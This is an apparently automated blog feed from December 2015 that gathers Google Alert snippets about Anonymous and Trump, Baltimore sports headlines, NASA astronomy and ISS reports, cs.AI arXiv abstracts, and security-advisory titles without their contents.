Latest YouTube Video

Saturday, December 12, 2015

Anonymous says it took down Trump Tower website

A still image from a YouTube video from Anonymous threatening presidential candidate Donald Trump before the group claimed it took down the ...

from Google Alert - anonymous http://ift.tt/1NW6CoA
via IFTTT

My Lady Careys Dompe (Anonymous)

My Lady Careys Dompe (Anonymous). Add File. Add Sheet MusicAdd Your Own ... Composer, Anonymous. Piece Style, Renaissance. Instrumentation ...

from Google Alert - anonymous http://ift.tt/1QbN7iy
via IFTTT

48 comments

Mark Ratner: Anonymous just picked the wrong guy to mess with. ... President Trump will refuse anonymous people entry into the U.S.. In fact, he will ...

from Google Alert - anonymous http://ift.tt/1OYQ1pk
via IFTTT

Ravens: LT Eugene Monroe placed on IR, ending his season; started 6 games this season, signed 5-year deal in March 2014 (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Ravens Report
Voted #1 Sports News App! Get It (http://t.co/QuvnqIDOBZ) and see why it's the easiest way to keep up with the Ravens. @Fanly
Baltimore, MD
http://t.co/QuvnqIDOBZ
Following: 3606 - Followers: 2928

December 12, 2015 at 10:50AM via Twitter http://twitter.com/ravens_fanly

[FD] Windows Authentication UI DLL side loading vulnerability

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] Event Viewer Snapin multiple DLL side loading vulnerabilities

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

[FD] COM+ Services DLL side loading vulnerability

--------------------------------------------------------------------

Source: Gmail -> IFTTT-> Blogger

Anonymous Declares War On Donald Trump — #OpTrump

After targeting the Islamic State (ISIS) group in the wake of Deadly terror attacks in Paris, hacktivist group Anonymous has now turned its attention to controversial US presidential candidate Donald Trump. The hacktivist group has declared war against Donald Trump following his recent radical speech stating he wanted to ban Muslims from entering the United States. <!-- adsense --> On


from The Hacker News http://ift.tt/1NhlWPA
via IFTTT

The Brightest Spot on Ceres


Dwarf planet Ceres is the largest object in the Solar System's main asteroid belt with a diameter of about 950 kilometers. Exploring Ceres from orbit since March, the Dawn spacecraft's camera has revealed about 130 or so mysterious bright spots, mostly associated with impact craters scattered around the small world's otherwise dark surface. The brightest one is near the center of the 90 kilometer wide Occator Crater, seen in this dramatic false color view combining near-infrared and visible light image data. A study now finds the bright spot's reflected light properties are probably most consistent with a type of magnesium sulfate called hexahydrite. Of course, magnesium sulfate is also known to Earth dwellers as epsom salt. Haze reported inside Occator also suggests the salty material could be left over as a mix of salt and water-ice sublimates on the surface. Since impacts would have exposed the material, Ceres' numerous and widely scattered bright spots may indicate the presence of a subsurface shell of ice-salt mix. In mid-December, Dawn will begin taking observations from its closest Ceres mapping orbit. via NASA http://ift.tt/1Y1YXjt

Space Weather to the Edge of the Solar System

Everyone likes to check the weather in a far away destination before they travel there. This is especially true for spaceflight, where the destination may be where no one has gone before. The mission of New Horizons to Pluto provided an opportunity to test our current space weather models, pushing them to the limit. This visualization presents the results from an Enlil model run, just one of the many space weather models being tested through the Community-Coordinated Modeling Center (CCMC) at NASA's Goddard Space Flight Center as part of the "New Horizons Flyby Modeling Challenge". This visualization presents a slice of the data through the ecliptic plane, the plane in which the planets of our solar system orbit. Because Pluto is a bit above this plane, the orbit is projected into the ecliptic plane of the data, as is the trajectory of the New Horizons probe. Three different variables are presented from the model - temperature, density, and pressure gradient, simultaneously, using the red, green and blue color channels of the color image. The density of the solar wind (green) flowing outward from the sun decreases as it spreads out. The temperature stays roughly constant as the solar wind material spreads through the solar system. We see the Parker spiral imprinted on the outflow from the spinning sun, much like the outflow from a spinning water sprinkler. We also see the strong density gradients (blue) created by coronal mass ejections and other shocks, propagating outward from the sun in the solar wind. We can observe regions of interesting interactions when the three primary colors of the basic variables combine to enhance the color, represented in the tricolor diagram below. White represents a hot, dense shock, while cyan (blue-green) represents a dense shock (usually visible close to the sun), magenta (purple) represents a hot, low-density shock, while yellow indicates hot and dense material, again usually close to the sun.

from NASA's Scientific Visualization Studio: Most Popular
via IFTTT

Moon Phase and Libration, 2016

Dial-A-MoonMonth: Day: UT Hour: init_user_date();show_moon_image(); show_moon_info();Click on the image to download a high-resolution version with labels for craters near the terminator.The animation archived on this page shows the geocentric phase, libration, position angle of the axis, and apparent diameter of the Moon throughout the year 2016, at hourly intervals. Until the end of 2016, the initial Dial-A-Moon image will be the frame from this animation for the current hour.More in this series: 2016 South | 2015 | 2015 South | 2014 | 2014 South | 2013 | 2013 South | 2012 | 2011Lunar Reconnaissance Orbiter (LRO) has been in orbit around the Moon since the summer of 2009. Its laser altimeter (LOLA) and camera (LROC) are recording the rugged, airless lunar terrain in exceptional detail, making it possible to visualize the Moon with unprecedented fidelity. This is especially evident in the long shadows cast near the terminator, or day-night line. The pummeled, craggy landscape thrown into high relief at the terminator would be impossible to recreate in the computer without global terrain maps like those from LRO.The Moon always keeps the same face to us, but not exactly the same face. Because of the tilt and shape of its orbit, we see the Moon from slightly different angles over the course of a month. When a month is compressed into 24 seconds, as it is in this animation, our changing view of the Moon makes it look like it's wobbling. This wobble is called libration.The word comes from the Latin for "balance scale" (as does the name of the zodiac constellation Libra) and refers to the way such a scale tips up and down on alternating sides. The sub-Earth point gives the amount of libration in longitude and latitude. The sub-Earth point is also the apparent center of the Moon's disk and the location on the Moon where the Earth is directly overhead.The Moon is subject to other motions as well. It appears to roll back and forth around the sub-Earth point. The roll angle is given by the position angle of the axis, which is the angle of the Moon's north pole relative to celestial north. The Moon also approaches and recedes from us, appearing to grow and shrink. The two extremes, called perigee (near) and apogee (far), differ by about 14%.The most noticed monthly variation in the Moon's appearance is the cycle of phases, caused by the changing angle of the Sun as the Moon orbits the Earth. The cycle begins with the waxing (growing) crescent Moon visible in the west just after sunset. By first quarter, the Moon is high in the sky at sunset and sets around midnight. The full Moon rises at sunset and is high in the sky at midnight. The third quarter Moon is often surprisingly conspicuous in the daylit western sky long after sunrise.Celestial north is up in these images, corresponding to the view from the northern hemisphere. The descriptions of the print resolution stills also assume a northern hemisphere orientation. (There is also a south-up version of this page.)The Moon's OrbitFrom this birdseye view, it's somewhat easier to see that the phases of the Moon are an effect of the changing angles of the sun, Moon and Earth. The Moon is full when its orbit places it in the middle of the night side of the Earth. First and Third Quarter Moon occur when the Moon is along the day-night line on the Earth.The First Point of Aries is at the 3 o'clock position in the image. The sun is in this direction at the March equinox. You can check this by freezing the animation at the 1:04 mark, or by freezing the full animation with the time stamp near March 20 at 4:00 UTC. This direction serves as the zero point for both ecliptic longitude and right ascension.The north pole of the Earth is tilted 23.5 degrees toward the 12 o'clock position at the top of the image. The tilt of the Earth is important for understanding why the north pole of the Moon seems to swing back and forth. In the full animation, watch both the orbit and the "gyroscope" Moon in the lower left. The widest swings happen when the Moon is at the 3 o'clock and 9 o'clock positions. When the Moon is at the 3 o'clock position, the ground we're standing on is tilted to the left when we look at the Moon. At the 9 o'clock position, it's tilted to the right. The tilt itself doesn't change. We're just turned around, looking in the opposite direction.The subsolar and sub-Earth points are the locations on the Moon's surface where the sun or the Earth are directly overhead, at the zenith. A line pointing straight up at one of these points will be pointing toward the sun or the Earth. The sub-Earth point is also the apparent center of the Moon's disk as observed from the Earth.In the animation, the blue dot is the sub-Earth point, and the yellow dot is the subsolar point. The lunar latitude and longitude of the sub-Earth point is a measure of the Moon's libration. For example, when the blue dot moves to the left of the meridian (the line at 0 degrees longitude), an extra bit of the Moon's western limb is rotating into view, and when it moves above the equator, a bit of the far side beyond the north pole becomes visible.At any given time, half of the Moon is in sunlight, and the subsolar point is in the center of the lit half. Full Moon occurs when the subsolar point is near the center of the Moon's disk. When the subsolar point is somewhere on the far side of the Moon, observers on Earth see a crescent phase.The Moon's orbit around the Earth isn't a perfect circle. The orbit is slightly elliptical, and because of that, the Moon's distance from the Earth varies between 28 and 32 Earth diameters, or about 356,400 and 406,700 kilometers. In each orbit, the smallest distance is called perigee, from Greek words meaning "near earth," while the greatest distance is called apogee. The Moon looks largest at perigee because that's when it's closest to us.The animation follows the imaginary line connecting the Earth and the Moon as it sweeps around the Moon's orbit. From this vantage point, it's easy to see the variation in the Moon's distance. Both the distance and the sizes of the Earth and Moon are to scale in this view. In the HD-resolution frames, the Earth is 50 pixels wide, the Moon is 14 pixels wide, and the distance between them is about 1500 pixels, on average.Note too that the Earth appears to go through phases just like the Moon does. For someone standing on the surface of the Moon, the sun and the stars rise and set, but the Earth doesn't move in the sky. It goes through a monthly sequence of phases as the sun angle changes. The phases are the opposite of the Moon's. During New Moon here, the Earth is full as viewed from the Moon.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1QitViS
via IFTTT

Moon Phase and Libration, 2016 South Up

Dial-A-MoonMonth: Day: UT Hour: init_user_date();show_moon_image(); show_moon_info();Click on the image to download a high-resolution version with labels for craters near the terminator.The animation archived on this page shows the geocentric phase, libration, position angle of the axis, and apparent diameter of the Moon throughout the year 2016, at hourly intervals. Until the end of 2016, the initial Dial-A-Moon image will be the frame from this animation for the current hour.More in this series: 2016 | 2015 | 2015 South | 2014 | 2014 South | 2013 | 2013 South | 2012 | 2011Lunar Reconnaissance Orbiter (LRO) has been in orbit around the Moon since the summer of 2009. Its laser altimeter (LOLA) and camera (LROC) are recording the rugged, airless lunar terrain in exceptional detail, making it possible to visualize the Moon with unprecedented fidelity. This is especially evident in the long shadows cast near the terminator, or day-night line. The pummeled, craggy landscape thrown into high relief at the terminator would be impossible to recreate in the computer without global terrain maps like those from LRO.The Moon always keeps the same face to us, but not exactly the same face. Because of the tilt and shape of its orbit, we see the Moon from slightly different angles over the course of a month. When a month is compressed into 24 seconds, as it is in this animation, our changing view of the Moon makes it look like it's wobbling. This wobble is called libration.The word comes from the Latin for "balance scale" (as does the name of the zodiac constellation Libra) and refers to the way such a scale tips up and down on alternating sides. The sub-Earth point gives the amount of libration in longitude and latitude. The sub-Earth point is also the apparent center of the Moon's disk and the location on the Moon where the Earth is directly overhead.The Moon is subject to other motions as well. It appears to roll back and forth around the sub-Earth point. The roll angle is given by the position angle of the axis, which is the angle of the Moon's north pole relative to celestial north. The Moon also approaches and recedes from us, appearing to grow and shrink. The two extremes, called perigee (near) and apogee (far), differ by more than 10%.The most noticed monthly variation in the Moon's appearance is the cycle of phases, caused by the changing angle of the Sun as the Moon orbits the Earth. The cycle begins with the waxing (growing) crescent Moon visible in the west just after sunset. By first quarter, the Moon is high in the sky at sunset and sets around midnight. The full Moon rises at sunset and is high in the sky at midnight. The third quarter Moon is often surprisingly conspicuous in the daylit western sky long after sunrise.Celestial south is up in these images, corresponding to the view from the southern hemisphere. The descriptions of the print resolution stills also assume a southern hemisphere orientation. (There is also a north-up version of this page.)The Moon's OrbitFrom this birdseye view, it's somewhat easier to see that the phases of the Moon are an effect of the changing angles of the sun, Moon and Earth. The Moon is full when its orbit places it in the middle of the night side of the Earth. First and Third Quarter Moon occur when the Moon is along the day-night line on the Earth.The First Point of Aries is at the 3 o'clock position in the image. The sun is in this direction at the March equinox. You can check this by freezing the animation at the 1:04 mark, or by freezing the full animation with the time stamp near March 20 at 4:00 UTC. This direction serves as the zero point for both ecliptic longitude and right ascension.The south pole of the Earth is tilted 23.5 degrees toward the 12 o'clock position at the top of the image. The tilt of the Earth is important for understanding why the north pole of the Moon seems to swing back and forth. In the full animation, watch both the orbit and the "gyroscope" Moon in the lower left. The widest swings happen when the Moon is at the 3 o'clock and 9 o'clock positions. When the Moon is at the 3 o'clock position, the ground we're standing on is tilted to the left when we look at the Moon. At the 9 o'clock position, it's tilted to the right. The tilt itself doesn't change. We're just turned around, looking in the opposite direction.The subsolar and sub-Earth points are the locations on the Moon's surface where the sun or the Earth are directly overhead, at the zenith. A line pointing straight up at one of these points will be pointing toward the sun or the Earth. The sub-Earth point is also the apparent center of the Moon's disk as observed from the Earth.In the animation, the blue dot is the sub-Earth point, and the yellow dot is the subsolar point. The lunar latitude and longitude of the sub-Earth point is a measure of the Moon's libration. For example, when the blue dot moves to the left of the meridian (the line at 0 degrees longitude), an extra bit of the Moon's eastern limb is rotating into view, and when it moves above the equator, a bit of the far side beyond the south pole becomes visible.At any given time, half of the Moon is in sunlight, and the subsolar point is in the center of the lit half. Full Moon occurs when the subsolar point is near the center of the Moon's disk. When the subsolar point is somewhere on the far side of the Moon, observers on Earth see a crescent phase.The Moon's orbit around the Earth isn't a perfect circle. The orbit is slightly elliptical, and because of that, the Moon's distance from the Earth varies between 28 and 32 Earth diameters, or about 356,400 and 406,700 kilometers. In each orbit, the smallest distance is called perigee, from Greek words meaning "near earth," while the greatest distance is called apogee. The Moon looks largest at perigee because that's when it's closest to us.The animation follows the imaginary line connecting the Earth and the Moon as it sweeps around the Moon's orbit. From this vantage point, it's easy to see the variation in the Moon's distance. Both the distance and the sizes of the Earth and Moon are to scale in this view. In the HD-resolution frames, the Earth is 50 pixels wide, the Moon is 14 pixels wide, and the distance between them is about 1500 pixels, on average.Note too that the Earth appears to go through phases just like the Moon does. For someone standing on the surface of the Moon, the sun and the stars rise and set, but the Earth doesn't move in the sky. It goes through a monthly sequence of phases as the sun angle changes. The phases are the opposite of the Moon's. During New Moon here, the Earth is full as viewed from the Moon.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1jUk849
via IFTTT

Friday, December 11, 2015

Sex and Love Addicts Anonymous

Sex and Love Addicts Anonymous is a Twelve step, Twelve Traditional oriented fellowship based on the model pioneered by Alcoholics Anonymous.

from Google Alert - anonymous http://ift.tt/1OY0srq
via IFTTT

[FD] APPLE-SA-2015-12-11-1 iTunes 12.3.2

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] Polycom VVX-Series Business Media Phones Path Traversal Vulnerability

Polycom VVX-Series Business Media Phones Path Traversal Vulnerability --Summar

Source: Gmail -> IFTTT-> Blogger

Trump Tower website taken down by…

Photo by Spencer Platt/Getty Images People walk by the Trump Tower in Midtown Manhattan on December 8, 2015 in New York City. The website for ...

from Google Alert - anonymous http://ift.tt/1RJ0SEK
via IFTTT

Ravens: QB Matt Schaub (chest) misses third day of practice; Jimmy Clausen expected to start Sunday vs. Seahawks (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Webform title displays for Anonymous, but not webform's fields

I am trying to understand why I can't get a webform's fields to display to Anonymous, when the form's title does display and the form page, as a main ...

from Google Alert - anonymous http://ift.tt/1Qjiszz
via IFTTT

Orioles: Resolving Chris Davis situation still at top of GM Dan Duquette's \"hefty to-do list\" for the offseason - Matz (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Recent Comments Widgets shows names as "Anonymous"

Recent Comments Widgets shows names as "Anonymous" (1 post). brt. Member Posted 36 minutes ago #. first of all: thank you very much for this great ...

from Google Alert - anonymous http://ift.tt/1UdyNEK
via IFTTT

ISS Daily Summary Report – 12/10/15

The ISS crew is sleep shifting today in support of Soyuz 43 (43S) undock and landing tomorrow.  Crew sleep will begin at 9:00am CST this morning.  43S undocking is scheduled to occur early Friday morning at 3:49am CST.   Orbital ATK (OA)-4 Status:  The crew started their day by outfitting the Node 1 to Cygnus vestibule, removing Controller Panel Assemblies (CPAs), and opening the Node1 and Cygnus hatches.  Once the hatches were open, they obtained an air sample and installed Inter-module Ventilation (IMV) ducting.  They also photo documented overall cargo configuration. No issues were observed with the cargo. Cygnus cargo operations are scheduled to start next week.   Crew Departure Preparation:  Yui and Lindgren continued packing their personal items in preparation for crew return to Earth on 43S tomorrow. The personal items will return by way of 43S, SpX-8, and SpX-9 vehicles.   Twins Study:  In support of the Twins Study, Kelly continued his week-long Flight Day 240 daily saliva collection and also made a urine collection.  This investigation is an integrated compilation of ten different studies led by multiple investigators.  The studies take advantage of a unique opportunity to look at the effects of space travel on identical twins, with one of them experiencing space travel for a year while the other remains earth-bound for that same year.  The study looks at changes in the human body that are important in the fields of genetics, psychology, physiology, microbiology, and immunology.   Sprint Ultrasound:  Kelly performed his Return minus 7 day (R-7) thigh and calf ultrasound scans today with assistance from Lindgren and guidance from the Sprint ground team.  Ultrasound scans are used to evaluate spaceflight-induced changes in the muscle volume. The Sprint investigation evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Upon completion of this study, investigators expect to provide an integrated resistance and aerobic exercise training protocol capable of maintaining muscle, bone and cardiovascular health while reducing total exercise time over the course of a long-duration space flight. This will provide valuable information in support of the long term goal of protecting human fitness for even longer space exploration missions.   Dose Distribution Inside the ISS – 3D (DOSIS 3D):  Kelly deinstalled the European Space Agency’s (ESA’s) DOSIS 3D passive detectors from the Columbus module for return on the 43S vehicle.  Data from the various active and passive radiation detectors installed in the ISS are used in the determination of the radiation field parameters absorbed dose and dose equivalent inside the ISS.  A concise three dimensional (3D) dose distribution map of all the segments of the ISS will be developed, based on this data and data from JAXA and NASA monitoring devices.   Microbiome Water Sample Handover:  Lindgren handed the Microbiome water sample collected on Tuesday to Kononenko for return on the 43S vehicle.   Veg-01:  Kelly refilled the Veg-01 plant pillows with water. The Veg-01 investigation is used to assess on-orbit function and performance of the Veggie facility, focusing on the growth and development of seedlings in the spaceflight environment and the composition of microbial flora on the plants and the facility.  For this run, Zinnias will be grown for 60 days and are expected to produce flowers.   Ras Labs-CASIS-ISS Project for Synthetic Muscle: Resistance to Radiation (Synthetic Muscle):  Lindgren took a set of historical photos of the synthetic muscle samples.  The purpose of this investigation is to measure the effects of radiation on proprietary synthetic muscle materials in space and earth environments. Robots made of these materials could provide assistance to humans in space, enhance survivability of robots during deep space travel, and provide support in extreme radiation environments on Earth.   Sleep Log:  Kornienko recorded a Sleep Log entry today after waking. The Sleep ISS-12 experiment monitors ambient light exposure and crew member activity and collects subjective evaluations of sleep and alertness.  The investigation examines the effects of space flight and ambient light exposure on sleep during a year-long mission on the ISS.   Space Headaches: Yui and Lindgren completed their weekly Space Headaches questionnaires today.  Headaches can be a common complaint during spaceflight. The Space Headaches experiment will provide information that may help in the development of methods to alleviate associated symptoms and improvement in the well-being and performance of crew members in space.     Today’s Planned Activities All activities were completed unless otherwise noted. Morning Inspection. SM ПСС (Caution & Warning Panel) Test / Manual Controls [РСУ] SLEEP – Questionnaire Morning Inspection, Laptop RS1(2) Reboot RSS 1, 2 Reboot TWIN – Saliva Sample Collection NEIROIMMUNITET. Saliva Test HRF – Sample MELFI Insertion TWIN – Urine Sample Collection HRF – Sample MELFI Insertion Soyuz 717 Samsung Tablet Recharge – initiate High Definition (HD) Camcorder Setup to capture Cygnus Hatch Opening Removal of Node 1 Nadir CBM Controller Panel Assembly (CPA) ISS crew and ГОГУ (RSA Flight Control Management Team) weekly conference PILOT-T. Preparation for the experiment On MCC GO De-installation of ТА251М1Б from Soyuz 717 Orbital Compartment WRS – Recycle Tank Fill USND2 – Hardware Activation Crew Departure Prep PILOT-T. Experiment Ops SPRINT – Hardware prep and installation Cygnus – Configuration for Vestibule Ingress SPRINT – Operator Assistance with the Experiment NEIROIMMUNITET. Closeout Ops Handover of USOS water samples to RS to be packed into P/L container for return on Soyuz 717 Soyuz 717 Return Stowage Ops (Payload Container) Progress 428 (DC1) Stowage Ops with IMS Support Acoustic Dosimeter Stow DOSIS 3D – Removal of Passive Dosimeters in Columbus Handover of DOS3D dosimeters to RS to be packed into P/L container for return on Soyuz 717 TWIN – Saliva Collection Kit Cygnus Ingress Cygnus (OA-4) Air Sampling using АК-1М sampler prior to Air Duct Installation Checking Charger Connection to ПН28-120 Invertor Cygnus – Cargo Photography Soyuz 718 Samsung Tablet Recharge – Initiate Video Footage of Greetings USND2 – Hardware Deactivation PILOT-T. Closeout Ops Audio-Answers to the Questions from Nauka I Zhizn magazine Crew Departure […]

from ISS On-Orbit Status Report http://ift.tt/1UcNojS
via IFTTT

Hacker-Friendly Search Engine that Lists Every Internet-Connected Device

Meet an all-new Hacker’s Search Engine similar to Shodan – Censys. At the end of last month, security researchers from SEC Consult found that the lazy manufacturers of home routers and Internet of Things (IoT) devices have been re-using the same set of hard-coded cryptographic keys, leaving around 3 millions of IoT devices open to mass hijacking. But how did the researchers get this


from The Hacker News http://ift.tt/1NRQ1Cf
via IFTTT

Government Could Hack Children's Toys to Spy on You

Smartphones, Smart TVs, Smart Watches, Cell Phone Towers, Messaging services… but now, What's Next? Smart Toys? Yes, probably. Tech expert is warning that 'Smart Toys' could now be used by the government intelligence agencies to spy on suspects. As part of the Investigatory Powers Bill, children's connected toys could be the next item to be used by the government in an effort to spy


from The Hacker News http://ift.tt/1QA2AY3
via IFTTT

France will not Ban Public Wi-Fi Or Tor Network, Prime Minister Valls Confirms

Despite the French Ministry of Interior's demands, France will not ban the TOR anonymity network or Free public Wi-Fi as a way to help the law enforcement fight terrorism. French Prime Minister Manual Valls has gone on record saying that a ban on Free public Wi-Fi is "not a course of action envisaged," and he is not in favor of banning the TOR anonymity network, either. Following the


from The Hacker News http://ift.tt/1QzSEOg
via IFTTT

Daytime Moon Meets Morning Star


Venus now appears as Earth's brilliant morning star, standing in a line-up of planets above the southeastern horizon before dawn. For most, the silvery celestial beacon rose predawn in a close pairing with an old crescent Moon on Monday, December 7. But also widely seen from locations in North and Central America, the lunar crescent actually occulted or passed in front of Venus during Monday's daylight hours. This time series follows the daytime approach of Moon and morning star in clear blue skies from Phoenix, Arizona. The progression of nine sharp telescopic snapshots, made between 9:30am and 9:35am local time, runs from lower left to upper right, when Venus winked out behind the bright lunar limb. via NASA http://ift.tt/1jQd6NP

Thursday, December 10, 2015

Convolutional Monte Carlo Rollouts in Go. (arXiv:1512.03375v1 [cs.LG])

In this work, we present a MCTS-based Go-playing program which uses convolutional networks in all parts. Our method performs MCTS in batches, explores the Monte Carlo search tree using Thompson sampling and a convolutional network, and evaluates convnet-based rollouts on the GPU. We achieve strong win rates against open source Go programs and attain competitive results against state of the art convolutional net-based Go-playing programs.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1RHylzi
via IFTTT

Exploration and Exploitation of Victorian Science in Darwin's Reading Notebooks. (arXiv:1509.07175v2 [cs.CL] UPDATED)

Search in an environment with an uncertain distribution of resources involves a trade-off between local exploitation and distant exploration. This extends to the problem of information foraging, where a knowledge-seeker shifts between reading in depth and studying new domains. To study this, we examine the reading choices made by one of the most celebrated scientists of the modern era: Charles Darwin. Darwin built his theory of natural selection in part by synthesizing disparate parts of Victorian science. When we analyze his extensively self-documented reading, we find he does not follow a pattern of surprise-minimization. Rather, he shifts between phases in which he either remains with familiar topics or seeks cognitive surprise in novel fields. On the longest timescales, these shifts correlate with major intellectual epochs of his career, as detected by Bayesian epoch estimation. When we compare Darwin's reading path with publication order of the same texts, we find Darwin more adventurous than the culture as a whole. These results provide novel quantitative evidence for historical hypotheses previously debated only qualitatively.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1FxghEk
via IFTTT

Learning Linguistic Biomarkers for Predicting Mild Cognitive Impairment using Compound Skip-grams. (arXiv:1511.02436v2 [cs.CL] UPDATED)

Predicting Mild Cognitive Impairment (MCI) is currently a challenge as existing diagnostic criteria rely on neuropsychological examinations. Automated Machine Learning (ML) models that are trained on verbal utterances of MCI patients can aid diagnosis. Using a combination of skip-gram features, our model learned several linguistic biomarkers to distinguish between 19 patients with MCI and 19 healthy control individuals from the DementiaBank language transcript clinical dataset. Results show that a model with compound of skip-grams has better AUC and could help ML prediction on small MCI data sample.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1Hsj82r
via IFTTT

Deep Reinforcement Learning in Parameterized Action Space. (arXiv:1511.04143v2 [cs.AI] UPDATED)

Recent work has shown that deep neural networks are capable of approximating both value functions and policies in reinforcement learning domains featuring continuous state and action spaces. However, to the best of our knowledge no previous work has succeeded at using deep neural networks in structured (parameterized) continuous action spaces. To fill this gap, this paper focuses on learning within the domain of simulated RoboCup soccer, which features a small set of discrete action types, each of which is parameterized with continuous variables. The best learned agent can score goals more reliably than the 2012 RoboCup champion agent. As such, this paper represents a successful extension of deep reinforcement learning to the class of parameterized action space MDPs.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1PJCj9f
via IFTTT

Anonymous woman pays off strangers' $20K Toys R Us layaways

A Massachusetts woman who paid off strangers' layaways last year has done the same this holiday season.

from Google Alert - anonymous http://ift.tt/1jRLwzY
via IFTTT

[FD] BFS-SA-2015-003: Internet Explorer CObjectElement Use-After-Free Vulnerability

Blue Frost Security GmbH http://ift.tt/1IH5eGS research(at)bluefrostsecurity.de BFS-SA-2015-003 10-December-2015

Source: Gmail -> IFTTT-> Blogger

Orioles Buzz: Baltimore reportedly inquired about Rockies OF Carlos Gonzalez; don't want to part with SP Kevin Gausman (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

I have a new follower on Twitter


B.J. Rains
Boise State football and basketball beat writer, Idaho Press-Tribune. AP Top 25 hoops voter. Contributor to ESPN Boise, KBOI TV. Email: bjrains@idahopress.com.
Boise, Idaho
http://t.co/unLpQMH0hj
Following: 3006 - Followers: 11092

December 10, 2015 at 03:00PM via Twitter http://twitter.com/BJRains

[vue-router] Components show as .

Using vue@1.0.10 and vue-router@0.7.7 . When I go to /bar , the Bar component is named <Anonymous Component> in Vue Devtools. Is that how it's ...

from Google Alert - anonymous http://ift.tt/1NY69Zf
via IFTTT

The case for anonymous case studies

The case for anonymous case studies. When beginning your application security journey, one of the most valuable actions you can take is to learn ...

from Google Alert - anonymous http://ift.tt/1NPWv4I
via IFTTT

'Create a new account for an anonymous order' rule don't work

But if the user is anonymous, and when he completes order his account is not created. 'Create a new account for an anonymous order' is enabled and ...

from Google Alert - anonymous http://ift.tt/1lxYsws
via IFTTT

SportsCenter Video: Orioles \"don't want to wait\" for Chris Davis, pulled offer - Buster Olney; willing to re-open talks (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Wednesday, December 9, 2015

I have a new follower on Twitter


Cordny Nederkoorn
Building a community about bird behaviour worldwide

https://t.co/BRsMfyyZpf
Following: 14964 - Followers: 16264

December 09, 2015 at 10:21PM via Twitter http://twitter.com/BirdsBehaviour

A Novel Regularized Principal Graph Learning Framework on Explicit Graph Representation. (arXiv:1512.02752v1 [cs.AI])

Many scientific datasets are of high dimension, and the analysis usually requires visual manipulation by retaining the most important structures of data. Principal curve is a widely used approach for this purpose. However, many existing methods work only for data with structures that are not self-intersected, which is quite restrictive for real applications. A few methods can overcome the above problem, but they either require complicated human-made rules for a specific task with lack of convergence guarantee and adaption flexibility to different tasks, or cannot obtain explicit structures of data. To address these issues, we develop a new regularized principal graph learning framework that captures the local information of the underlying graph structure based on reversed graph embedding. As showcases, models that can learn a spanning tree or a weighted undirected $\ell_1$ graph are proposed, and a new learning algorithm is developed that learns a set of principal points and a graph structure from data, simultaneously. The new algorithm is simple with guaranteed convergence. We then extend the proposed framework to deal with large-scale data. Experimental results on various synthetic and six real world datasets show that the proposed method compares favorably with baselines and can uncover the underlying structure correctly.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1jP1URQ
via IFTTT

ShapeNet: An Information-Rich 3D Model Repository. (arXiv:1512.03012v1 [cs.GR])

We present ShapeNet: a richly-annotated, large-scale repository of shapes represented by 3D CAD models of objects. ShapeNet contains 3D models from a multitude of semantic categories and organizes them under the WordNet taxonomy. It is a collection of datasets providing many semantic annotations for each 3D model such as consistent rigid alignments, parts and bilateral symmetry planes, physical sizes, keywords, as well as other planned annotations. Annotations are made available through a public web-based interface to enable data visualization of object attributes, promote data-driven geometric analysis, and provide a large-scale quantitative benchmark for research in computer graphics and vision. At the time of this technical report, ShapeNet has indexed more than 3,000,000 models, 220,000 models out of which are classified into 3,135 categories (WordNet synsets). In this report we describe the ShapeNet effort as a whole, provide details for all currently available datasets, and summarize future plans.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1QglapI
via IFTTT

Learning measures of semi-additive behaviour. (arXiv:1512.03020v1 [cs.AI])

In business analytics, measure values, such as sales numbers or volumes of cargo transported, are often summed along values of one or more corresponding categories, such as time or shipping container. However, not every measure should be added by default (e.g., one might more typically want a mean over the heights of a set of people); similarly, some measures should only be summed within certain constraints (e.g., population measures need not be summed over years). In systems such as Watson Analytics, the exact additive behaviour of a measure is often determined by a human expert. In this work, we propose a small set of features for this issue. We use these features in a case-based reasoning approach, where the system suggests an aggregation behaviour, with 86% accuracy in our collected dataset.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1jP1URK
via IFTTT

Exploiting Causality for Selective Belief Filtering in Dynamic Bayesian Networks. (arXiv:1401.7941v2 [cs.AI] UPDATED)

Dynamic Bayesian networks (DBNs) are a general model for stochastic processes with partially observed states. Belief filtering in DBNs is the task of inferring the belief state (i.e. the probability distribution over process states) based on incomplete and noisy observations. This can be a hard problem in complex processes with large state space. In this article, we explore the idea of accelerating the filtering task by automatically exploiting causality in the process. We consider a specific type of causal relation, called passivity, which pertains to how state variables cause changes in other variables. We present a novel filtering method, called Passivity-based Monitoring (PM), which maintains a factored belief representation and exploits passivity to perform selective updates over the belief factors. PM produces exact belief states under certain assumptions and approximate belief states otherwise, where the approximation error is bounded by the degree of uncertainty in the process. We show empirically, in synthetic processes with varying sizes and degrees of passivity, that PM is faster than several alternative methods while achieving competitive accuracy. Furthermore, we demonstrate how passivity occurs naturally in a complex system such as a multi-robot warehouse, and how PM can exploit this to accelerate the filtering task.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1aLCiAv
via IFTTT

Hinge-Loss Markov Random Fields and Probabilistic Soft Logic. (arXiv:1505.04406v2 [cs.LG] UPDATED)

